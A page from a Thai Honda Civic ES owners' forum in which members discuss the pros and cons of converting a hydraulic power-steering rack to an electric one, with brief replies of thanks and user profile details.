โดยรวมผมชอบนะ อาจจะตอบสนองมือไม่เหมือนน้ำมัน แต่ผมชอบตอนใช้ความเร็วสูงนี่แหละ นิ่งมากครับ


ของโต้แรคยุ่นนะครับ ตรงรุ่น 1.7 สเปคยุ่น
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  KAATO  fff_1232 
bakery24


เข้าร่วม: 26 มกรา 2010
ตอบ: 260

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 307
ให้คำขอบคุณ: 209

ที่อยู่: ยุดยา นะจ๊ะ
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 17 กันยา 2012 19:30 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
กระทู้ดีมีมากๆ 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  KAATO 
วุฒิชัย


ชื่อเล่น: ตั้ม

เข้าร่วม: 26 มิถุนา 2011
ตอบ: 4151

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3281
ให้คำขอบคุณ: 4338

ที่อยู่: แม่สอด-ตาก-โขทัย-อุตรดิตถ์
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 17 กันยา 2012 19:39 - ปัญหาข้อดีข้อเสียของการเปลี่ยนแร็คน้ำมันไปแร็คไฟฟ้ามีไรบ้างคร้าบบบบบบบ
เยื่ยมมากเลยครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.